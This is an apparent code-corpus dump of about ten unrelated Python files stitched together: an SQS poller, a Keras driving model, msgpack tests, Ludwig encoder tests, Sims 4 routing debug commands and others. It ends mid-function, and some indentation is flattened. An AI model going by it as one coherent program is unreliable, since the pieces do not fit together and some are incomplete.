ax = fig.add_subplot(1, len(images), i + 1)
ax.set_title("%s: %.2f" % (k, v))
plt.imshow(images[k])
plt.axis("off")
# show the OpenCV methods
plt.show()
| StarcoderdataPython |
1621023 | <gh_stars>0
import time
import boto3
import json
import common
import os
QUEUE = os.environ.get("QUEUE")
client = boto3.client('sqs')
url = client.get_queue_url(QueueName=QUEUE).get('QueueUrl')
sqs = boto3.resource('sqs')
queue = sqs.Queue(url)
def getMessage(start):
    """Poll the SQS queue once and return the JSON-decoded message body.

    Receives at most one message; on success the message is decoded and
    then deleted from the queue. Returns None when the long poll times
    out with no message available.

    Note: ``start`` is accepted for symmetry with the caller's timing
    bookkeeping but is not used here.
    """
    messages = queue.receive_messages()
    if not messages:
        print("Queue timed out")
        return None
    print("Retrieved queue message")
    first = messages[0]
    payload = json.loads(first.body)
    first.delete()
    return payload
def run():
    """Loop until message is received or queue times out and execute task.

    Polls the queue repeatedly; each received body is passed to
    ``common.exec``. The loop ends when ``getMessage`` returns None
    (queue long-poll timed out).
    """
    start = common.log(time.time(), "Getting from queue")
    body = getMessage(start)
    # PEP 8: compare to None with `is not`, not `!=`.
    while body is not None:
        start = common.log(start, "Retrieved from queue")
        common.exec(body)
        body = getMessage(start)
if __name__ == '__main__':
run()
| StarcoderdataPython |
385876 | <reponame>sswarnakar/Behavioral-Cloning-Using-Udacity-Self-Driving-Car-Simulator
import tensorflow as tf
tf.python.control_flow_ops = tf
from keras.models import Sequential, model_from_json, load_model
from keras.optimizers import *
from keras.layers import Dense, Activation, Flatten, Dropout, Lambda, Cropping2D, ELU
from keras.layers.convolutional import Convolution2D
#from keras.layers.pooling import MaxPooling2D
#from keras.callbacks import EarlyStopping
from scipy.misc import imread, imsave
from sklearn.model_selection import train_test_split
import pandas as pd
import numpy as np
import random
#################################################################
def flipped(image, measurement):
    """Mirror an image left-to-right and negate its steering measurement.

    Used for data augmentation: a horizontally flipped camera frame
    corresponds to the opposite steering angle.
    """
    mirrored = np.fliplr(image)
    return mirrored, -measurement
def get_image(i, data):
    """Load one training image for row *i*, picking a random camera.

    A camera (left/center/right) is chosen uniformly at random; the
    steering measurement is offset by a fixed correction for the side
    cameras. The image is then flipped (with negated steering) with
    probability 0.5 for augmentation.
    """
    positions, corrections = ['left', 'center', 'right'], [.25, 0, -.25]
    ID, r = data.index[i], random.choice([0, 1, 2])
    measurement = data['steering'][ID] + corrections[r]
    # Side-camera paths appear to carry a leading character (likely a
    # space from the CSV) that is stripped with [1:] — TODO confirm.
    path = PATH + data[positions[r]][ID][1:]
    if r == 1: path = PATH + data[positions[r]][ID]
    image = imread(path)
    # Randomly mirror the frame to balance left/right steering examples.
    if random.random() > 0.5:
        image, measurement = flipped(image, measurement)
    #print(i, ID)
    return image, measurement
#################################################################
def generate_samples(data, batch_size):
    """Infinite Keras generator yielding (images, measurements) batches.

    Iterates over *data* in steps of *batch_size*; the final batch of an
    epoch may be smaller when len(data) is not a multiple of batch_size.
    """
    while True:
        SIZE = len(data)
        # NOTE(review): DataFrame.sample(frac=1) returns a shuffled COPY,
        # which is discarded here — in-place shuffling was likely intended
        # (e.g. data = data.sample(frac=1)); confirm before relying on
        # per-epoch shuffling.
        data.sample(frac = 1)
        for start in range(0, SIZE, batch_size):
            images, measurements = [], []
            for this_id in range(start, start + batch_size):
                # Guard against running past the end on the last batch.
                if this_id < SIZE:
                    image, measurement = get_image(this_id, data)
                    measurements.append(measurement)
                    images.append(image)
            yield np.array(images), np.array(measurements)
#################################################################
model = Sequential()
model.add(Lambda(lambda x: (x / 127.5) - 1., input_shape = (160, 320, 3)))
model.add(Cropping2D(cropping=((70, 25), (0, 0)), input_shape = (160, 320, 3)))
model.add(Convolution2D(16, 8, 8, subsample = (4, 4), border_mode = "same"))
model.add(ELU())
model.add(Convolution2D(32, 5, 5, subsample = (2, 2), border_mode = "same"))
model.add(ELU())
model.add(Convolution2D(64, 5, 5, subsample = (2, 2), border_mode = "same"))
model.add(Flatten())
model.add(Dropout(.2))
model.add(ELU())
model.add(Dense(512))
model.add(Dropout(.5))
model.add(ELU())
model.add(Dense(1))
model.summary()
model.compile(optimizer = "adam", loss = "mse")
#################################################################
BATCH_SIZE = 64
NUMBER_OF_EPOCHS = 10
PATH = "data/"
CSV_FILE = "driving_log.csv"
DATA = pd.read_csv(PATH + CSV_FILE, usecols = [0, 1, 2, 3])
TRAINING_DATA, VALIDATION_DATA = train_test_split(DATA, test_size = 0.15)
TOTAL_TRAIN_DATA = len(TRAINING_DATA)
TOTAL_VALID_DATA = len(VALIDATION_DATA)
#################################################################
print('Training model...')
training_generator = generate_samples(TRAINING_DATA, batch_size = BATCH_SIZE)
validation_generator = generate_samples(VALIDATION_DATA, batch_size = BATCH_SIZE)
#early_stopping = EarlyStopping(monitor='val_loss', patience = 10, verbose = 1, mode = 'auto')
history_object = model.fit_generator(training_generator,
samples_per_epoch = TOTAL_TRAIN_DATA,
validation_data = validation_generator,
nb_val_samples = TOTAL_VALID_DATA,
nb_epoch = NUMBER_OF_EPOCHS,
#callbacks = [early_stopping],
verbose = 1)
#################################################################
print('Saving model...')
model.save("model.h5")
with open("model.json", "w") as json_file:
json_file.write(model.to_json())
print("Model Saved.")
| StarcoderdataPython |
3421701 | import pytest
from pathlib import Path
import datetime
from mock import patch
import numpy
from .._msgpack_api import read_msgpack, write_msgpack
from .._msgpack_api import msgpack_loads, msgpack_dumps
from .._msgpack_api import msgpack_encoders, msgpack_decoders
from .util import make_tempdir
def test_msgpack_dumps():
    """Serializing a dict yields msgpack bytes; either key order is valid."""
    data = {"hello": "world", "test": 123}
    # Two acceptable encodings because dict key order is not guaranteed to
    # produce a single canonical byte sequence.
    expected = [b"\x82\xa5hello\xa5world\xa4test{", b"\x82\xa4test{\xa5hello\xa5world"]
    msg = msgpack_dumps(data)
    assert msg in expected
def test_msgpack_loads():
    """Deserializing msgpack bytes restores the original dict contents."""
    msg = b"\x82\xa5hello\xa5world\xa4test{"
    data = msgpack_loads(msg)
    assert len(data) == 2
    assert data["hello"] == "world"
    assert data["test"] == 123
def test_read_msgpack_file():
    """read_msgpack loads a well-formed msgpack file from disk."""
    file_contents = b"\x81\xa5hello\xa5world"
    with make_tempdir({"tmp.msg": file_contents}, mode="wb") as temp_dir:
        file_path = temp_dir / "tmp.msg"
        assert file_path.exists()
        data = read_msgpack(file_path)
        assert len(data) == 1
        assert data["hello"] == "world"
def test_read_msgpack_file_invalid():
    """read_msgpack raises ValueError on a malformed msgpack payload."""
    # Missing the leading map header byte, so the payload is invalid.
    file_contents = b"\xa5hello\xa5world"
    with make_tempdir({"tmp.msg": file_contents}, mode="wb") as temp_dir:
        file_path = temp_dir / "tmp.msg"
        assert file_path.exists()
        with pytest.raises(ValueError):
            read_msgpack(file_path)
def test_write_msgpack_file():
    """write_msgpack writes the expected msgpack bytes to disk."""
    data = {"hello": "world", "test": 123}
    # Either key order is acceptable on disk (see test_msgpack_dumps).
    expected = [b"\x82\xa5hello\xa5world\xa4test{", b"\x82\xa4test{\xa5hello\xa5world"]
    with make_tempdir(mode="wb") as temp_dir:
        file_path = temp_dir / "tmp.msg"
        write_msgpack(file_path, data)
        with Path(file_path).open("rb") as f:
            assert f.read() in expected
# Simulate an environment without numpy by patching the module-level
# references the msgpack integration uses.
@patch("srsly.msgpack._msgpack_numpy.np", None)
@patch("srsly.msgpack._msgpack_numpy.has_numpy", False)
def test_msgpack_without_numpy():
    """Test that msgpack works without numpy and raises correct errors (e.g.
    when serializing datetime objects, the error should be msgpack's TypeError,
    not a "'np' is not defined error")."""
    with pytest.raises(TypeError):
        msgpack_loads(msgpack_dumps(datetime.datetime.now()))
def test_msgpack_custom_encoder_decoder():
    """Registering custom (de)serializer hooks makes user types round-trip."""
    class CustomObject:
        # Minimal user-defined type that msgpack cannot serialize natively.
        def __init__(self, value):
            self.value = value
    def serialize_obj(obj, chain=None):
        # Encoder hook: wrap CustomObject in a tagged dict, else defer to chain.
        if isinstance(obj, CustomObject):
            return {"__custom__": obj.value}
        return obj if chain is None else chain(obj)
    def deserialize_obj(obj, chain=None):
        # Decoder hook: unwrap the tagged dict back into a CustomObject.
        if "__custom__" in obj:
            return CustomObject(obj["__custom__"])
        return obj if chain is None else chain(obj)
    data = {"a": 123, "b": CustomObject({"foo": "bar"})}
    # Without registered hooks, serializing the custom type must fail.
    with pytest.raises(TypeError):
        msgpack_dumps(data)
    # Register custom encoders/decoders to handle CustomObject
    msgpack_encoders.register("custom_object", func=serialize_obj)
    msgpack_decoders.register("custom_object", func=deserialize_obj)
    bytes_data = msgpack_dumps(data)
    new_data = msgpack_loads(bytes_data)
    assert new_data["a"] == 123
    assert isinstance(new_data["b"], CustomObject)
    assert new_data["b"].value == {"foo": "bar"}
    # Test that it also works with combinations of encoders/decoders (e.g. numpy)
    data = {"a": numpy.zeros((1, 2, 3)), "b": CustomObject({"foo": "bar"})}
    bytes_data = msgpack_dumps(data)
    new_data = msgpack_loads(bytes_data)
    assert isinstance(new_data["a"], numpy.ndarray)
    assert isinstance(new_data["b"], CustomObject)
    assert new_data["b"].value == {"foo": "bar"}
| StarcoderdataPython |
9692824 | # -*- coding: utf-8 -*-
"""
pip_services_runtime.errors.__init__
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Errors module initialization
:copyright: Digital Living Software Corp. 2015-2016, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
__all__ = [ \
'ErrorCategory', 'MicroserviceError', 'BadRequestError', 'BuildError', \
'CallError', 'ConfigError', 'ConflictError', 'ConnectionError', 'FileError', 'NotFoundError', \
'StateError', 'UnauthorizedError', 'UnsupportedError', 'UnknownError' \
]
from .ErrorCategory import ErrorCategory
from .MicroserviceError import MicroserviceError
from .BadRequestError import BadRequestError
from .BuildError import BuildError
from .CallError import CallError
from .ConfigError import ConfigError
from .ConflictError import ConflictError
from .ConnectionError import ConnectionError
from .FileError import FileError
from .NotFoundError import NotFoundError
from .StateError import StateError
from .UnauthorizedError import UnauthorizedError
from .UnsupportedError import UnsupportedError
from .UnknownError import UnknownError
| StarcoderdataPython |
1726236 | <gh_stars>1-10
"""
author: <NAME> (SSRL)
4/27/2017
""" | StarcoderdataPython |
1777882 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""""""
__author__ = 'leferrad'
from rl3.agent.feature import LBPFeatureTransformer
from rl3.agent.q_learning import QubeRegAgent, QubeTabularAgent, play_one
from rl3.environment.base import CubeEnvironment
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
reward_function = 'lbph' # simple or lbph
seed = 39# np.random.randint(0, 100)
print "Using seed=%i" % seed
ce = CubeEnvironment(n=3, seed=seed, whiteplastic=False, reward_function=reward_function)
ce.randomize(1)
#model = QubeTabularAgent(ce)
model = QubeRegAgent(ce, LBPFeatureTransformer())
# TODO: crear un mecanismo de attachments para el env (por ej, para monitorear algoritmos seguidos en cada iter)
gamma = 0.99
N = 3000
totalrewards = np.empty(N)
costs = np.empty(N)
for n in range(N):
eps = 1.0/np.sqrt(n+1)
totalreward = play_one(model, ce, eps, gamma, max_iters=100)
totalrewards[n] = totalreward
if n % 100 == 0:
print "episode:", n, "total reward:", totalreward, "eps:", eps, "avg reward (last 100):", \
totalrewards[max(0, n-100):(n+1)].mean()
# print "Algorithm followed: %s" % ce.actions_taken
#ce.render(flat=False)#.savefig("test%02d.png" % m, dpi=865 / c.N)
seed = np.random.randint(0, 100)
#print "Using seed=%i" % seed
ce = CubeEnvironment(n=3, seed=seed, whiteplastic=False, reward_function=reward_function)
ce.randomize(n/100 + 1)
print "avg reward for last 100 episodes:", totalrewards[-100:].mean()
print "total steps:", totalrewards.sum()
plt.plot(totalrewards)
plt.title("Rewards")
plt.show()
print "Done!" | StarcoderdataPython |
3565347 | <gh_stars>1-10
class A:
def doStuff(self, foo=True): return True
class B(A):
def doStuff(self, foo=True):
<selection>return A.doStuff(self, foo)</selection>
def otherMethod(self, foo, bar):
print foo, bar
| StarcoderdataPython |
3489594 | <filename>tests/ludwig/modules/test_encoder.py
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import numpy as np
import pytest
import torch
from ludwig.data.dataset_synthesizer import build_vocab
from ludwig.encoders.base import Encoder
from ludwig.encoders.image_encoders import MLPMixerEncoder, ResNetEncoder, Stacked2DCNN
from ludwig.encoders.sequence_encoders import (
ParallelCNN,
SequenceEmbedEncoder,
StackedCNN,
StackedCNNRNN,
StackedParallelCNN,
StackedRNN,
)
DROPOUT = 0.5
DEVICE = "cuda" if torch.cuda.is_available() else "cpu"
def create_encoder(encoder_type, **encoder_kwargs):
    """Instantiate *encoder_type* with the given keyword arguments."""
    return encoder_type(**encoder_kwargs)
def _generate_image(image_size):
    """Return a synthetic float32 image of shape *image_size*."""
    # NOTE(review): np.random.randint(0, 1, ...) draws from the half-open
    # interval [0, 1), i.e. always 0, so every generated "image" is all
    # zeros. If random 0/1 pixels were intended this should be
    # randint(0, 2, ...) — confirm.
    return np.random.randint(0, 1, image_size).astype(np.float32)
def generate_images(image_size, num_images):
    """Stack *num_images* synthetic images of shape *image_size* into one array."""
    frames = []
    for _ in range(num_images):
        frames.append(_generate_image(image_size))
    return np.array(frames)
def _generate_sentence(vocab_size, max_len):
sentence = np.zeros(max_len, dtype=np.int32)
random_length = random.randint(1, max_len)
sentence[:random_length] = [random.randint(0, vocab_size - 1) for _ in range(random_length)]
return sentence
def generate_random_sentences(num_sentences=10, max_len=10, vocab_size=10):
    """Return (text, vocab): random token-id sentences plus the vocabulary.

    *text* is a (num_sentences, max_len) int array of token ids; *vocab*
    is the list produced by build_vocab for *vocab_size* entries.
    """
    # Generate some random text
    vocab = build_vocab(vocab_size)
    text = np.array([_generate_sentence(vocab_size, max_len) for _ in range(num_sentences)])
    return text, vocab
def encoder_test(
    encoder,
    input_data,
    output_dtype,
    output_shape,
    output_data=None,
):
    """Helper method to test different kinds of encoders.

    :param encoder: encoder object
    :param input_data: numpy array of data to encode
    :param output_dtype: expected torch dtype of the encoder output
    :param output_shape: expected shape (as a list) of the encoder output
    :param output_data: expected output data (optional)
    :return: None; failures surface as assertion errors
    """
    # Move model and input to the same device before running.
    encoder = encoder.to(DEVICE)
    # Run the encoder
    input_data = torch.from_numpy(input_data).to(DEVICE)
    hidden = encoder(input_data)["encoder_output"]
    # Check output shape and type
    assert hidden.dtype == output_dtype
    assert list(hidden.shape) == output_shape
    if output_data is not None:
        # todo the hidden output is actually a tensor. May need modification
        assert np.allclose(hidden, output_data)
def test_image_encoders_resnet():
# Test the resnet encoder for images
encoder_kwargs = {"resnet_size": 8, "num_filters": 8, "output_size": 28, "dropout": DROPOUT}
image_size = (3, 10, 10)
output_shape = [1, 28]
input_image = generate_images(image_size, 1)
encoder = create_encoder(ResNetEncoder, height=image_size[1], width=image_size[2], **encoder_kwargs)
encoder_test(
encoder=encoder, input_data=input_image, output_dtype=torch.float32, output_shape=output_shape, output_data=None
)
output_shape = [5, 28]
input_images = generate_images(image_size, 5)
encoder_test(
encoder=encoder,
input_data=input_images,
output_dtype=torch.float32,
output_shape=output_shape,
output_data=None,
)
assert encoder is not None
assert encoder.resnet.__class__.__name__ == "ResNet"
assert list(encoder.resnet.output_shape) == [64, 3, 3]
assert len(encoder.fc_stack.layers) == 1
assert encoder.fc_stack.layers[0]["output_size"] == 28
assert encoder.fc_stack.layers[0]["activation"] == "relu"
def test_image_encoders_stacked_2dcnn():
# Test the resnet encoder for images
encoder_kwargs = {"num_conv_layers": 2, "num_filters": 16, "output_size": 28, "dropout": DROPOUT}
image_size = (3, 10, 10)
encoder = create_encoder(
Stacked2DCNN, num_channels=image_size[0], height=image_size[1], width=image_size[2], **encoder_kwargs
)
assert encoder is not None
assert encoder.conv_stack_2d is not None
assert list(encoder.conv_stack_2d.output_shape) == [32, 1, 1]
assert len(encoder.fc_stack.layers) == 1
assert encoder.conv_stack_2d.layers[0]["pool_kernel_size"] == 2
assert encoder.conv_stack_2d.layers[0]["stride"] == 1
assert encoder.conv_stack_2d.layers[0]["pool_stride"] == 2
assert encoder.conv_stack_2d.layers[0]["norm"] is None
assert encoder.conv_stack_2d.layers[0]["activation"] == "relu"
assert encoder.conv_stack_2d.layers[0]["dropout"] == 0
output_shape = [1, 28]
input_image = generate_images(image_size, 1)
encoder_test(
encoder=encoder, input_data=input_image, output_dtype=torch.float32, output_shape=output_shape, output_data=None
)
output_shape = [5, 28]
input_images = generate_images(image_size, 5)
encoder_test(
encoder=encoder,
input_data=input_images,
output_dtype=torch.float32,
output_shape=output_shape,
output_data=None,
)
def test_image_encoders_mlpmixer():
# Test the resnet encoder for images
encoder_kwargs = {
"patch_size": 5,
"embed_size": 8,
"token_size": 32,
"channel_dim": 16,
"num_layers": 2,
"dropout": DROPOUT,
}
image_size = (3, 10, 10)
output_shape = [1, 8]
input_image = generate_images(image_size, 1)
encoder = create_encoder(
MLPMixerEncoder, num_channels=image_size[0], height=image_size[1], width=image_size[2], **encoder_kwargs
)
encoder_test(
encoder=encoder, input_data=input_image, output_dtype=torch.float32, output_shape=output_shape, output_data=None
)
output_shape = [5, 8]
input_images = generate_images(image_size, 5)
encoder_test(
encoder=encoder,
input_data=input_images,
output_dtype=torch.float32,
output_shape=output_shape,
output_data=None,
)
assert encoder is not None
assert encoder.mlp_mixer.__class__.__name__ == "MLPMixer"
assert len(encoder.mlp_mixer.mixer_blocks) == 2
assert list(encoder.mlp_mixer.mixer_blocks[0].mlp1.output_shape) == [4]
assert encoder.mlp_mixer.patch_conv.__class__.__name__ == "Conv2d"
assert encoder.mlp_mixer.patch_conv.kernel_size == (5, 5)
def test_sequence_encoder_embed():
num_sentences = 4
embedding_size = 5
max_len = 6
# Generate data
text, vocab = generate_random_sentences(
num_sentences=num_sentences,
max_len=max_len,
)
encoder_kwargs = {"embedding_size": embedding_size, "vocab": vocab}
# Different values for reduce_output and the corresponding expected size
reduce_outputs = ["sum", None, "concat"]
output_shapes = [
[num_sentences, embedding_size],
[num_sentences, max_len, embedding_size],
[num_sentences, max_len * embedding_size],
]
for reduce_output, output_shape in zip(reduce_outputs, output_shapes):
for trainable in [True, False]:
encoder_kwargs["reduce_output"] = reduce_output
encoder_kwargs["embeddings_trainable"] = trainable
encoder_kwargs["dropout"] = DROPOUT
encoder = create_encoder(SequenceEmbedEncoder, max_sequence_length=max_len, **encoder_kwargs)
encoder_test(
encoder=encoder,
input_data=text,
output_dtype=torch.float32,
output_shape=output_shape,
output_data=None,
)
assert encoder.embed_sequence.dropout is not None
@pytest.mark.parametrize("encoder_type", [ParallelCNN, StackedCNN, StackedParallelCNN, StackedRNN, StackedCNNRNN])
@pytest.mark.parametrize("trainable", [True, False])
@pytest.mark.parametrize("reduce_output", ["sum", "max"])
def test_sequence_encoders(encoder_type: Encoder, trainable: bool, reduce_output: str):
num_sentences = 4
embedding_size = 5
max_len = 7
output_size = 3
# Generate data
text, vocab = generate_random_sentences(
num_sentences=num_sentences,
max_len=max_len,
)
encoder_kwargs = {
"embedding_size": embedding_size,
"vocab": vocab,
"output_size": output_size,
"num_fc_layers": 1,
"filter_size": 3,
"num_filters": 8,
"state_size": output_size,
}
# todo figure out the output size for parallel 1d conv
output_shape = [num_sentences, output_size]
encoder_kwargs["embeddings_trainable"] = trainable
encoder_kwargs["dropout"] = DROPOUT
encoder_kwargs["dropout"] = DROPOUT
encoder_kwargs["recurrent_dropout"] = DROPOUT
encoder_kwargs["fc_dropout"] = DROPOUT
encoder_kwargs["reduce_output"] = reduce_output
encoder = create_encoder(encoder_type, max_sequence_length=max_len, **encoder_kwargs)
encoder_test(
encoder=encoder, input_data=text, output_dtype=torch.float32, output_shape=output_shape, output_data=None
)
assert isinstance(encoder, encoder_type)
| StarcoderdataPython |
1731140 | from _math import Vector3
from timeit import itertools
from elements import GeneratorElement
from interactions.constraints import Circle, Constraint, create_constraint_set
from interactions.utils.routing import PlanRoute, FollowPath
from objects.components.types import ROUTING_COMPONENT
from server_commands.argument_helpers import OptionalTargetParam, get_optional_target, TunableInstanceParam, find_substring_in_repr, extract_floats
from server_commands.visualization_commands import POLYGON_STR, POLYGON_END_PARAM
from sims4.commands import CommandType
from sims4.geometry import RestrictedPolygon
import debugvis
import element_utils
import postures
import routing
import services
import sims4.commands
@sims4.commands.Command('routing.debug.follow')
def routing_debug_follow(x:float=None, y:float=None, z:float=None, obj:OptionalTargetParam=None, _connection=None):
if x is None or y is None or z is None:
return False
obj = get_optional_target(obj, _connection=_connection)
if obj is None:
return False
routing_component = obj.get_component(ROUTING_COMPONENT)
if routing_component is None:
return False
def _do_route_gen(timeline):
location = routing.Location(Vector3(x, y, z), routing_surface=obj.routing_surface)
goal = routing.Goal(location)
routing_context = obj.get_routing_context()
route = routing.Route(obj.routing_location, (goal,), routing_context=routing_context)
plan_primitive = PlanRoute(route, obj)
result = yield from element_utils.run_child(timeline, plan_primitive)
if not result:
return result
yield
nodes = plan_primitive.path.nodes
if not (nodes and nodes.plan_success):
return False
yield
else:
follow_path_element = FollowPath(obj, plan_primitive.path)
result = yield from element_utils.run_child(timeline, follow_path_element)
if not result:
return result
yield
return True
yield
timeline = services.time_service().sim_timeline
timeline.schedule(GeneratorElement(_do_route_gen))
return True
@sims4.commands.Command('routing.debug.waypoints')
def routing_debug_waypoints(*waypoint_data, _connection=None):
obj = get_optional_target(None, _connection=_connection)
if obj is None:
return False
routing_component = obj.get_component(ROUTING_COMPONENT)
if routing_component is None:
return False
object_manager = services.object_manager()
waypoints = []
for (is_float, data_points) in itertools.groupby(waypoint_data, lambda d: '.' in d):
while True:
try:
if is_float:
position = Vector3(float(next(data_points)), float(next(data_points)), float(next(data_points)))
routing_surface = routing.SurfaceIdentifier(services.current_zone_id(), 0, routing.SurfaceType.SURFACETYPE_WORLD)
location = routing.Location(position, routing_surface=routing_surface)
else:
o = object_manager.get(int(next(data_points)))
if o is None:
continue
routing_surface = o.provided_routing_surface
if routing_surface is None:
continue
location = routing.Location(o.position, routing_surface=routing_surface)
waypoints.append((routing.Goal(location),))
except StopIteration:
break
def _do_route_gen(timeline):
routing_context = obj.get_routing_context()
route = routing.Route(obj.routing_location, waypoints[-1], waypoints=waypoints[:-1], routing_context=routing_context)
plan_primitive = PlanRoute(route, obj)
result = yield from element_utils.run_child(timeline, plan_primitive)
if not result:
return result
yield
nodes = plan_primitive.path.nodes
if not (nodes and nodes.plan_success):
return False
yield
else:
follow_path_element = FollowPath(obj, plan_primitive.path)
result = yield from element_utils.run_child(timeline, follow_path_element)
if not result:
return result
yield
return True
yield
timeline = services.time_service().sim_timeline
timeline.schedule(GeneratorElement(_do_route_gen))
return True
@sims4.commands.Command('routing.debug.generate_routing_goals_geometry', command_type=CommandType.DebugOnly)
def routing_debug_generate_routing_goals_from_geometry(*args, obj:OptionalTargetParam=None, _connection=None):
output = sims4.commands.Output(_connection)
obj = get_optional_target(obj, _connection=_connection)
if obj is None:
return False
routing_component = obj.get_component(ROUTING_COMPONENT)
if routing_component is None:
return False
total_string = ''.join(args)
polygon_strs = find_substring_in_repr(total_string, POLYGON_STR, POLYGON_END_PARAM)
if not polygon_strs:
output('No valid polygons. must start with {} and end with {}'.format(POLYGON_STR, POLYGON_END_PARAM))
return
constraints = []
routing_surface = routing.SurfaceIdentifier(services.current_zone_id(), 0, routing.SurfaceType.SURFACETYPE_OBJECT)
for poly_str in polygon_strs:
point_list = extract_floats(poly_str)
if not point_list or len(point_list) % 2 != 0:
output('Point list is not valid length. Too few or one too many.')
return
vertices = []
for index in range(0, len(point_list), 2):
vertices.append(sims4.math.Vector3(point_list[index], 0.0, point_list[index + 1]))
polygon = sims4.geometry.Polygon(vertices)
geometry = RestrictedPolygon(polygon, [])
constraints.append(Constraint(geometry=geometry, routing_surface=routing_surface))
constraint_set = create_constraint_set(constraints)
if not postures.posture_graph.enable_debug_goals_visualization:
sims4.commands.execute('debugvis.goals.enable', _connection)
handles = constraint_set.get_connectivity_handles(obj)
handles_str = 'Handles: {}'.format(len(handles))
sims4.commands.output(handles_str, _connection)
all_goals = []
for handle in handles:
goal_list = handle.get_goals()
goals_str = '\tGoals: {}'.format(len(goal_list))
sims4.commands.output(goals_str, _connection)
all_goals.extend(goal_list)
if postures.posture_graph.enable_debug_goals_visualization:
for constraint in constraints:
with debugvis.Context('goal_scoring', routing_surface=constraint.routing_surface) as layer:
for polygon in constraint.geometry.polygon:
layer.add_polygon(polygon, routing_surface=constraint.routing_surface)
for goal in all_goals:
position = goal.location.transform.translation
layer.add_point(position, routing_surface=constraint.routing_surface)
@sims4.commands.Command('routing.debug.generate_routing_goals_circle', command_type=CommandType.DebugOnly)
def routing_debug_generate_routing_goals(x:float=None, y:float=None, z:float=None, radius:int=None, obj:OptionalTargetParam=None, _connection=None):
    """Debug command: generate and visualize routing goals inside a circle.

    Builds a Circle constraint of *radius* around (x, y, z) on the world
    routing surface, prints the number of connectivity handles and goals
    for the target object, and draws the constraint polygons plus goal
    points when goal visualization is enabled.
    """
    if x is None or (y is None or z is None) or radius is None:
        sims4.commands.output('Please enter 4 floats for x,y,z and radius', _connection)
        return False
    obj = get_optional_target(obj, _connection=_connection)
    if obj is None:
        return False
    routing_component = obj.get_component(ROUTING_COMPONENT)
    if routing_component is None:
        return False
    # Turn on goal visualization so the generated goals can be seen.
    if not postures.posture_graph.enable_debug_goals_visualization:
        sims4.commands.execute('debugvis.goals.enable', _connection)
    position = Vector3(x, y, z)
    routing_surface = routing.SurfaceIdentifier(services.current_zone_id(), 0, routing.SurfaceType.SURFACETYPE_WORLD)
    constraint = Circle(position, radius, routing_surface)
    handles = constraint.get_connectivity_handles(obj)
    handles_str = 'Handles: {}'.format(len(handles))
    sims4.commands.output(handles_str, _connection)
    all_goals = []
    for handle in handles:
        goal_list = handle.get_goals()
        goals_str = '\tGoals: {}'.format(len(goal_list))
        sims4.commands.output(goals_str, _connection)
        all_goals.extend(goal_list)
    if postures.posture_graph.enable_debug_goals_visualization:
        with debugvis.Context('goal_scoring', routing_surface=routing_surface) as layer:
            for polygon in constraint.geometry.polygon:
                layer.add_polygon(polygon, routing_surface=routing_surface)
            # `position` is rebound here; the circle center is no longer needed.
            for goal in all_goals:
                position = goal.location.transform.translation
                layer.add_point(position, routing_surface=routing_surface)
@sims4.commands.Command('routing.debug.set_behavior')
def routing_debug_set_behavior(object_routing_behavior:TunableInstanceParam(sims4.resources.Types.SNIPPET), obj:OptionalTargetParam=None, _connection=None):
    """Schedule the given object-routing-behavior snippet on the target.

    Returns True when the behavior element was scheduled; False when the
    snippet is missing, the target cannot be resolved, or the target has
    no routing component.
    """
    if object_routing_behavior is None:
        return False
    # Pass the connection through so the command can fall back to the
    # requesting client's active target, consistent with the other
    # routing.debug commands in this module (the original omitted it).
    obj = get_optional_target(obj, _connection=_connection)
    if obj is None:
        return False
    routing_component = obj.get_component(ROUTING_COMPONENT)
    if routing_component is None:
        return False
    timeline = services.time_service().sim_timeline
    timeline.schedule(object_routing_behavior(obj))
    return True
| StarcoderdataPython |
9633786 | <reponame>EvgenDEP1/fitness
from django.contrib.auth.forms import AuthenticationForm
from authapp.models import UserProfile
class MyAuthForm(AuthenticationForm):
    """Login form bound to the project's custom UserProfile user model."""
    class Meta:
        # Only the credential fields are exposed on the login form.
        model = UserProfile
        fields = ('username', 'password')
6424875 | <gh_stars>0
import logging
import sys
from typing import List, Optional, Set, Callable, Dict, Type
from langmodels.evaluation.definitions import EvaluationResult
from langmodels.evaluation.customization import TokenTypeSubset
from langmodels.model import TrainedModel
DEFAULT_N_MODEL_SUGGESTIONS = 100
logger = logging.getLogger(__name__)
def bin_entropy(model: TrainedModel, line: str, extension: str, append_eof: bool,
                token_type_subsets: Optional[Set[TokenTypeSubset]] = None, max_context_allowed: int = sys.maxsize,
                full_tokens: bool = True) \
        -> Dict[TokenTypeSubset, EvaluationResult]:
    """Compute per-token entropies for *line*, aggregated per token-type subset.

    Changes the state of the model!

    For each requested ``TokenTypeSubset`` the returned ``EvaluationResult``
    holds one entry per token: the token's entropy when its type belongs to
    the subset, otherwise ``None``; plus the mean entropy over the counted
    tokens (0.0 when the subset matched no tokens).
    """
    # Default to a single subset covering every token type.
    token_type_subsets = token_type_subsets or {TokenTypeSubset.full_set()}
    all_entropies, tokens, all_token_types, context_lengths = model.get_entropies_for_text(line, extension, full_tokens=full_tokens, append_eof=append_eof, max_context_allowed=max_context_allowed)
    evaluation_results: Dict[TokenTypeSubset, EvaluationResult] = {}
    for token_type_subset in token_type_subsets:
        res = []  # entropy per token; None for tokens outside the subset
        sum = 0.0  # NOTE: shadows the builtin `sum` within this loop
        count = 0
        for entropy, token_type in zip(all_entropies, all_token_types):
            if token_type_subset.contains(token_type):
                res.append(entropy)
                sum += entropy
                count += 1
            else:
                res.append(None)
        # The per-context-length breakdown is only accumulated for "small"
        # context limits; 1000 appears to be a magic threshold bounding the
        # accumulator list size — TODO confirm intent.
        if max_context_allowed < 1000:
            of_context_length_cumul = [(0.0, 0)] * max_context_allowed
            for entropy, token_type, context_length in zip(all_entropies, all_token_types, context_lengths):
                if token_type_subset.contains(token_type):
                    if context_length is not None:
                        of_context_length_cumul[context_length] = (of_context_length_cumul[context_length][0] + entropy, of_context_length_cumul[context_length][1] + 1)
            # Turn (entropy_sum, n) accumulators into (mean_entropy, n) pairs.
